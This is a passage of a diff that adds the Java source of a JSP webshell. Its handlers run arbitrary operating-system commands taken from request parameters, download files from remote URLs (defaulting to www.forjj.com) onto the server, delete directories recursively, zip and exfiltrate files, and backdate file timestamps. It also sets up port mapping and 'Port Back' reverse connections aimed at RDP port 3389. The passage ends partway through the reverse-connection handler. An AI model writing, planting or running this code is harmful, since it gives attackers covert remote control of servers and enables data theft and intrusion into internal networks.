+					if (charset.equals("ANSI"))
+						outs = new BufferedWriter(new FileWriter(new File(path)));
+					else
+						outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset));
+					outs.write(content,0,content.length());
+					outs.close();
+					JSession.setAttribute(MSG,"Save File <span style='color:green'>"+(new File(path)).getName()+"</span> With <span style='font-weight:bold;color:red'>"+charset+"</span> Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class VEditPropertyInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String filepath = request.getParameter("filepath");
+					File f = new File(filepath);
+					if (!f.exists())
+						return;
+					String read = f.canRead() ? "checked=\"checked\"" : "";
+					String write = f.canWrite() ? "checked=\"checked\"" : "";
+					Calendar cal = Calendar.getInstance();
+					cal.setTimeInMillis(f.lastModified());
+
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+					"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+					"<h2>Set File Property &raquo;</h2>"+
+					"<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\"  /></p>"+
+					"<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "+
+					"<p>"+
+					"  <input type=\"checkbox\" disabled "+read+" name=\"read\" id=\"checkbox\">Read "+
+					"  <input type=\"checkbox\" disabled "+write+" name=\"write\" id=\"checkbox2\">Write "+
+					"</p>"+
+					"<p>Instead &raquo;"+
+					"year:"+
+					"<input class=\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\"  />"+
+					"month:"+
+					"<input class=\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\"  />"+
+					"day:"+
+					"<input class=\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\"  />"+
+					""+
+					"hour:"+
+					"<input class=\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\"  />"+
+					"minute:"+
+					"<input class=\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\"  />"+
+					"second:"+
+					"<input class=\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\"  />"+
+					"</p>"+
+					"<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"+
+					"</form>"+
+					"</td></tr></table>");
+				} catch (Exception e) {
+					throw e ;
+				}
+			}
+		}
+		private static class EditPropertyInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String f = request.getParameter("file");
+					File file = new File(f);
+					if (!file.exists())
+						return;
+
+					String year = request.getParameter("year");
+					String month = request.getParameter("month");
+					String date = request.getParameter("date");
+					String hour = request.getParameter("hour");
+					String minute = request.getParameter("minute");
+					String second = request.getParameter("second");
+
+					Calendar cal = Calendar.getInstance();
+					cal.set(Calendar.YEAR,Integer.parseInt(year));
+					cal.set(Calendar.MONTH,Integer.parseInt(month)-1);
+					cal.set(Calendar.DATE,Integer.parseInt(date));
+					cal.set(Calendar.HOUR,Integer.parseInt(hour));
+					cal.set(Calendar.MINUTE,Integer.parseInt(minute));
+					cal.set(Calendar.SECOND,Integer.parseInt(second));
+					if(file.setLastModified(cal.getTimeInMillis())){
+						JSession.setAttribute(MSG,"Reset File Property Success!");
+					} else {
+						JSession.setAttribute(MSG,"<span style='color:red'>Reset File Property Failed!</span>");
+					}
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//VShell
+		private static class VsInvoker extends DefaultInvoker{
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String cmd = request.getParameter("command");
+					String program = request.getParameter("program");
+					if (cmd == null) {
+						if (ISLINUX)
+							cmd = "id";
+						else
+							cmd = "cmd.exe /c set";
+					}
+					if (program == null) 
+						program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt";
+					if (JSession.getAttribute(MSG)!=null) {
+						Util.outMsg(out,JSession.getAttribute(MSG).toString());
+						JSession.removeAttribute(MSG);
+					}
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+					"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+					"<h2>Execute Program &raquo;</h2>"+
+					"<p>"+
+					"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+					"<input type=\"hidden\" name=\"type\" value=\"program\">"+
+					"Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\"  />"+
+					"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+					"</p>"+
+					"</form>"+
+					"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+					"<h2>Execute Shell &raquo;</h2>"+
+					"<p>"+
+					"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+					"<input type=\"hidden\" name=\"type\" value=\"command\">"+
+					"Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\"  />"+
+					"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+					"</p>"+
+					"</form>"+
+					"</td>"+
+					"</tr></table>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class ShellInvoker extends DefaultInvoker{
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String type = request.getParameter("type");
+					if (type.equals("command")) {
+						((Invoker)ins.get("vs")).invoke(request,response,JSession);
+						out.println("<div style='margin:10px'><hr/>");
+						out.println("<pre>");
+						String command = request.getParameter("command");
+						if (!Util.isEmpty(command)) {
+							Process pro = Runtime.getRuntime().exec(command);
+							BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+							String s = reader.readLine();
+							while (s != null) {
+								out.println(Util.htmlEncode(Util.getStr(s)));
+								s = reader.readLine();
+							}
+							reader.close();
+							reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
+							s = reader.readLine();
+							while (s != null) {
+								out.println(Util.htmlEncode(Util.getStr(s)));
+								s = reader.readLine();
+							}
+							reader.close();
+							out.println("</pre></div>");
+						}
+					} else {
+						String program = request.getParameter("program");
+						if (!Util.isEmpty(program)) {
+							Process pro = Runtime.getRuntime().exec(program);
+							JSession.setAttribute(MSG,"Program Has Run Success!");
+							((Invoker)ins.get("vs")).invoke(request,response,JSession);
+						}
+					}
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class DownInvoker extends DefaultInvoker{
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String path  = request.getParameter("path");
+					if (Util.isEmpty(path)) 
+						return;
+					InputStream i = null;
+					Object enter = JSession.getAttribute(ENTER);
+					String fileName = null;
+					if (enter == null) {
+						File f = new File(path);
+						if (!f.exists()) 
+							return;
+						fileName = f.getName();
+						i = new FileInputStream(f);
+					} else {
+						ZipFile zf = new ZipFile((String)enter);
+						ZipEntry entry = new ZipEntry(path);
+						fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1);
+						i = zf.getInputStream(entry);
+					}
+					response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET));
+					BufferedInputStream input = new BufferedInputStream(i);
+					BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
+					byte[] data = new byte[1024];
+					int len = input.read(data);
+					while (len != -1) {
+						output.write(data,0,len);
+						len = input.read(data);
+					}
+					input.close();
+					output.close();
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//VDown
+		private static class VdInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String savepath = request.getParameter("savepath");
+					String url = request.getParameter("url");
+					if (Util.isEmpty(url))
+						url = "http://www.forjj.com/";
+					if (Util.isEmpty(savepath)) {
+						savepath = JSession.getAttribute(CURRENT_DIR).toString();
+					}
+					if (!Util.isEmpty(JSession.getAttribute("done"))) {
+						Util.outMsg(out,"Download Remote File Success!");
+						JSession.removeAttribute("done");
+					}
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+						"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+						"<h2>Remote File DownLoad &raquo;</h2>"+
+						"<p>"+
+						"<input type=\"hidden\" name=\"o\" value=\"downRemote\">"+
+						"<p>File&nbsp;&nbsp;&nbsp;URL: "+
+						"  <input class=\"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"200\"  /></p>"+
+						"<p>Save Path: "+
+						"<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"200\"  /></p>"+
+						"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\"  />"+
+						"</p>"+
+						"</form></table>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class DownRemoteInvoker extends DefaultInvoker {
+			public boolean doBefore(){return true;}
+			public boolean doAfter(){return true;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					 String downFileUrl = request.getParameter("url");
+					 String savePath = request.getParameter("savepath");
+					 if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
+						 return;
+					 URL downUrl = new URL(downFileUrl);
+					 URLConnection conn = downUrl.openConnection();
+					 
+					 File tempF = new File(savePath);
+					 File saveF = tempF;
+					 if (tempF.isDirectory()) {
+						String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1);
+						saveF = new File(tempF,fName);
+					 }
+					 BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
+					 BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF));
+					 byte[] data = new byte[1024];
+					  int len = in.read(data);
+					  while (len != -1) {
+						  out.write(data,0,len);
+						  len = in.read(data);
+					  }
+					  in.close();
+					  out.close();
+					  JSession.setAttribute("done","d");
+					  ((Invoker)ins.get("vd")).invoke(request,response,JSession);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class IndexInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					((Invoker)ins.get("filelist")).invoke(request,response,JSession);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class MkDirInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String name = request.getParameter("name");
+					File f = new File(name);
+					if (!f.isAbsolute()) {
+						String path = JSession.getAttribute(CURRENT_DIR).toString();
+						if (!path.endsWith("/"))
+							path += "/";
+						path += name;
+						f = new File(path);
+					}
+					f.mkdirs();
+					JSession.setAttribute(MSG,"Make Directory Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class MoveInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String src = request.getParameter("src");
+					String target  = request.getParameter("to");
+					if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+						File file = new File(src);
+						if(file.renameTo(new File(target))) {
+							JSession.setAttribute(MSG,"Move File Success!");
+						} else {
+							String msg = "Move File Failed!";
+							if (file.isDirectory()) {
+								msg += "The Move Will Failed When The Directory Is Not Empty.";
+							}
+							JSession.setAttribute(MSG,msg);
+						}
+						response.sendRedirect(SHELL_NAME);
+					}
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class RemoveDirInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String dir = request.getParameter("dir");
+					File file = new File(dir);
+					if (file.exists()) {
+						deleteFile(file);
+						deleteDir(file);
+					}
+					
+					JSession.setAttribute(MSG,"Remove Directory Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+			public void deleteFile(File f) {
+				if (f.isFile()) {
+					f.delete();
+				}else {
+					File[] list = f.listFiles();
+					for (int i = 0;i<list.length;i++) {
+						File ff=list[i];
+						deleteFile(ff);
+					}
+				}
+			}
+			public void deleteDir(File f) {
+				File[] list = f.listFiles();
+				if (list.length == 0) {
+					f.delete();
+				} else {
+					for (int i = 0;i<list.length;i++) {
+						File ff=list[i];
+						deleteDir(ff);
+					}
+					deleteDir(f);
+				}
+			}
+		}
+		private static class PackBatchInvoker extends DefaultInvoker{
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String files = request.getParameter("files");
+					if (Util.isEmpty(files))
+						return;
+					String saveFileName = request.getParameter("savefilename");
+					File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+					if (saveF.exists()) {
+						JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+						response.sendRedirect(SHELL_NAME);
+						return;
+					}
+					ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+					String[] arr = files.split(",");
+					for (int i = 0;i<arr.length;i++) {
+						String f=arr[i];
+						File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
+						ZipEntry entry = new ZipEntry(pF.getName());
+						zout.putNextEntry(entry);
+						FileInputStream fInput = new FileInputStream(pF);
+						int len = 0;
+						byte[] buf = new byte[1024];
+						while ((len = fInput.read(buf)) != -1) {
+							zout.write(buf, 0, len);
+							zout.flush();
+						}
+						fInput.close();
+					}
+					zout.close();
+					JSession.setAttribute(MSG,"Pack Files Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e;
+				}
+			}
+		}
+		private static class VPackConfigInvoker extends DefaultInvoker{
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String packfile = request.getParameter("packedfile");
+					String currentd = JSession.getAttribute(CURRENT_DIR).toString();
+					out.println("<form action='"+SHELL_NAME+"' method='post'>"+
+								"<input type='hidden' name='o' value='pack'/>"+
+								"<input type='hidden' name='config' value='true'/>"+
+								"<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+								"    <tr>"+
+								"      <td><h2 id=\"Bin_H2_Title\">Pack Configuration &gt;&gt;<hr/></h2>"+
+								"        <div id=\"hOWTm\">"+
+								"          <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+								"            <tr align=\"center\">"+
+								"              <td style=\"width:5%\"></td>"+
+								"              <td  align=\"center\"><table border=\"0\">"+
+								"                <tr>"+
+								"                  <td>Packed Dir</td>"+
+								"                  <td><input type=\"text\" name=\"packedfile\" size='100' value=\""+packfile+"\" class=\"input\"/></td>"+
+								"                </tr>"+
+								"                <tr>"+
+								"                  <td>Save To</td>"+
+								"                  <td><input type=\"text\" name=\"savefilename\" size='100' value=\""+((currentd.endsWith("/") ? currentd : currentd+"/")+"pack.zip")+"\" class=\"input\"/></td>"+
+								"                </tr>"+
+								"                <tr>"+
+								"                  <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>"+
+								"					<input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist"+
+								"					<hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>"+
+								"					</fieldset></td>"+
+								"                  </tr>"+
+								"                <tr>"+
+								"                  <td>Filesize Filter</td>"+
+								"                  <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) "+
+								"					<input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>"+
+								"                </tr>"+
+								"                <tr>"+
+								"                  <td>Exclude Dir</td>"+
+								"                  <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>"+
+								"                </tr>"+
+								"              </table></td>"+
+								"            </tr>"+
+								"            <tr align=\"center\">"+
+								"              <td colspan=\"2\">"+
+								"                <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />"+
+								"              </td>"+
+								"            </tr>"+
+								"          </table>"+
+								"        </div></td>"+
+								"    </tr>"+
+								"  </table></form>"
+								);
+				} catch (Exception e) {
+					
+					throw e;
+				}
+			}
+		}
+		private static class PackInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			private boolean config = false;
+			private String extFilter = "blacklist";
+			private String[] fileExts = null;
+			private String sizeFilter = "no";
+			private int filesize = 0;
+			private String[] exclude = null;
+			private String packFile = null;
+			private void reset(){
+				this.config = false;
+				this.extFilter = "blacklist";
+				this.fileExts = null;
+				this.sizeFilter = "no";
+				this.filesize = 0;
+				this.exclude = null;
+				this.packFile = null;
+			}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String config = request.getParameter("config");
+					if (!Util.isEmpty(config) && config.equals("true")) {
+						this.config = true;
+						this.extFilter = request.getParameter("extfilter");
+						this.fileExts = request.getParameter("fileext").split(",");
+						this.sizeFilter = request.getParameter("sizefilter");
+						this.filesize = Integer.parseInt(request.getParameter("filesize"));
+						this.exclude = request.getParameter("exclude").split(",");
+					}
+					String packedFile = request.getParameter("packedfile");
+					if (Util.isEmpty(packedFile))
+						return;
+					this.packFile = packedFile;
+					String saveFileName = request.getParameter("savefilename");
+					File saveF = null;
+					if (this.config)
+						saveF = new File(saveFileName);
+					else
+						saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+					if (saveF.exists()) {
+						JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+						response.sendRedirect(SHELL_NAME);
+						return;
+					}
+					File pF = new File(packedFile);
+					ZipOutputStream zout = null;
+					String base = "";
+					if (pF.isDirectory()) {
+						if (pF.listFiles().length == 0) {
+							JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty .");
+							response.sendRedirect(SHELL_NAME);
+							this.reset();
+							return;
+						}
+						zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+						zipDir(pF,base,zout);
+					} else {
+						zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+						zipFile(pF,base,zout);
+					}
+					zout.close();
+					this.reset();
+					JSession.setAttribute(MSG,"Pack File Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					throw e;
+				}
+			}
+			public void zipDir(File f,String base,ZipOutputStream zout)  throws Exception {
+					if (f.isDirectory()) {
+						if (this.config) {
+							String curName = f.getAbsolutePath().replace('\\','/');
+							curName = curName.replaceAll("\\Q"+this.packFile+"\\E","");
+							if (this.exclude != null) {
+								for (int i = 0;i<exclude.length;i++) {
+									if (!Util.isEmpty(exclude[i]) && curName.startsWith(exclude[i])) {
+										return;
+									}
+								}
+							}
+						}
+						File[] arr = f.listFiles();
+						for (int i = 0;i<arr.length;i++) {
+							File ff=arr[i];
+							String tmpBase = base;
+							if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
+								tmpBase += "/";
+							zipDir(ff,tmpBase+f.getName(),zout);
+						}
+					} else {
+						String tmpBase = base;
+						if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
+								tmpBase += "/";
+						zipFile(f,tmpBase,zout);
+					}
+				
+			}
+			public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
+				if (this.config) {
+					String ext = f.getName().substring(f.getName().lastIndexOf('.')+1);
+					if (this.extFilter.equals("blacklist")) {
+						if (Util.exists(this.fileExts,ext)) {
+							return;
+						}
+					} else if (this.extFilter.equals("whitelist")) {
+						if (!Util.exists(this.fileExts,ext)) {
+							return;
+						}
+					}
+					if (!this.sizeFilter.equals("no")) {
+						double size = f.length() / 1024;
+						if (this.sizeFilter.equals("greaterthan")) {
+							if (size < filesize)
+								return;
+						} else if (this.sizeFilter.equals("lessthan")) {
+							if (size > filesize)
+								return;
+						}
+					}
+				}
+			   ZipEntry entry = new ZipEntry(base+f.getName());
+			   zout.putNextEntry(entry);
+			   FileInputStream fInput = new FileInputStream(f);
+			   int len = 0;
+			   byte[] buf = new byte[1024];
+			   while ((len = fInput.read(buf)) != -1) {
+				zout.write(buf, 0, len);
+				zout.flush();
+			   }
+			   fInput.close();
+			}
+		}
+		private static class UnPackInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String savepath = request.getParameter("savepath");
+					String zipfile = request.getParameter("zipfile");
+					if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
+						return;
+					File save = new File(savepath);
+					save.mkdirs();
+					ZipFile file = new ZipFile(new File(zipfile));   
+					Enumeration e = file.entries();   
+					while (e.hasMoreElements()) {   
+						ZipEntry en = (ZipEntry) e.nextElement(); 
+						String entryPath = en.getName();
+						int index = entryPath.lastIndexOf("/");
+						if (index != -1)
+							entryPath = entryPath.substring(0,index);
+						File absEntryFile = new File(save,entryPath);
+						if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 
+							absEntryFile.mkdirs();
+							BufferedOutputStream output = null;
+							BufferedInputStream input = null;
+							try {
+								output = new BufferedOutputStream(   
+										new FileOutputStream(new File(save,en.getName())));   
+								input = new BufferedInputStream(   
+										file.getInputStream(en));   
+								byte[] b = new byte[1024];   
+								int len = input.read(b);   
+								while (len != -1) {   
+									output.write(b, 0, len);   
+									len = input.read(b);   
+								}   
+							} catch (Exception ex) {
+							} finally {
+								try {
+									if (output != null)
+										output.close();
+									if (input != null)
+										input.close();
+								} catch (Exception ex1) {
+								}
+							}
+					}
+					file.close();
+					JSession.setAttribute(MSG,"UnPack File Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//VMapPort
+		private static class VmpInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					Object localIP = JSession.getAttribute("localIP");
+					Object localPort = JSession.getAttribute("localPort");
+					Object remoteIP = JSession.getAttribute("remoteIP");
+					Object remotePort = JSession.getAttribute("remotePort");
+					Object done = JSession.getAttribute("done");
+
+					JSession.removeAttribute("localIP");
+					JSession.removeAttribute("localPort");
+					JSession.removeAttribute("remoteIP");
+					JSession.removeAttribute("remotePort");
+					JSession.removeAttribute("done");
+
+					if (Util.isEmpty(localIP))
+						localIP = InetAddress.getLocalHost().getHostAddress();
+					if (Util.isEmpty(localPort))
+						localPort = "3389";
+					if (Util.isEmpty(remoteIP))
+						remoteIP = "www.forjj.com";
+					if (Util.isEmpty(remotePort))
+						remotePort = "80";
+					if (!Util.isEmpty(done))
+						Util.outMsg(out,done.toString());
+
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+					"<input type=\"hidden\" name=\"o\" value=\"mapPort\">"+
+					"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;<hr/></h2>"+
+					"      <div id=\"hOWTm\">"+
+					"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+					"      <tr align=\"center\">"+
+					"        <td style=\"width:5%\"></td>"+
+					"        <td style=\"width:20%\" align=\"left\"><br/>Local Ip :"+
+					"          <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+
+					"          </td>"+
+					"        <td style=\"width:20%\" align=\"left\">Local Port :"+
+					"          <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" /></td>"+
+					"        <td style=\"width:20%\" align=\"left\">Remote Ip :"+
+					"          <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" /></td>"+
+					"        <td style=\"width:20%\" align=\"left\">Remote Port :"+
+					"          <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" /></td>"+
+					"      </tr>"+
+					"      <tr align=\"center\">"+
+					"        <td colspan=\"5\"><br/>"+
+					"          <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+
+					"			<input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+
+					"    </td>"+
+					"    </tr>"+
+					"	</table>"+
+					"    </div>"+
+					"</td>"+
+					"</tr>"+
+					"</table>"+
+					"</form>");
+					String targetIP = request.getParameter("targetIP");
+					String targetPort = request.getParameter("targetPort");
+					String yourIP = request.getParameter("yourIP");
+					String yourPort = request.getParameter("yourPort");
+					if (Util.isEmpty(targetIP))
+						targetIP = "127.0.0.1";
+					if (Util.isEmpty(targetPort))
+						targetPort = "3389";
+					if (Util.isEmpty(yourIP))
+						yourIP = request.getRemoteAddr();
+					if (Util.isEmpty(yourPort))
+						yourPort = "53";
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+					"<input type=\"hidden\" name=\"o\" value=\"portBack\">"+
+					"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td><h2 id=\"Bin_H2_Title\">Port Back &gt;&gt;<hr/></h2>"+
+					"      <div id=\"hOWTm\">"+
+					"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+					"      <tr align=\"center\">"+
+					"        <td style=\"width:5%\"></td>"+
+					"        <td style=\"width:20%\" align=\"left\"><br/>Target Ip :"+
+					"          <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+targetIP+"\" />"+
+					"          </td>"+
+					"        <td style=\"width:20%\" align=\"left\">Target Port :"+
+					"          <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+targetPort+"\" /></td>"+
+					"        <td style=\"width:20%\" align=\"left\">Your Ip :"+
+					"          <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+yourIP+"\" /></td>"+
+					"        <td style=\"width:20%\" align=\"left\">Your Port :"+
+					"          <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+yourPort+"\" /></td>"+
+					"      </tr>"+
+					"      <tr align=\"center\">"+
+					"        <td colspan=\"5\"><br/>"+
+					"          <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />"+
+					"    </td>"+
+					"    </tr>"+
+					"	</table>"+
+					"    </div>"+
+					"</td>"+
+					"</tr>"+
+					"</table>"+
+					"</form>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//StopMapPort
+		private static class SmpInvoker extends DefaultInvoker {
+			public boolean doAfter(){return true;}
+			public boolean doBefore(){return true;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					Object obj = JSession.getAttribute(PORT_MAP);
+					if (obj != null) {
+						ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP);
+						server.close();
+					}
+					JSession.setAttribute("done","Stop Success!");
+					((Invoker)ins.get("vmp")).invoke(request,response,JSession);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//PortBack
+		private static class PortBackInvoker extends DefaultInvoker {
+			public boolean doAfter(){return true;}
+			public boolean doBefore(){return true;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String targetIP = request.getParameter("targetIP");
+					String targetPort = request.getParameter("targetPort");
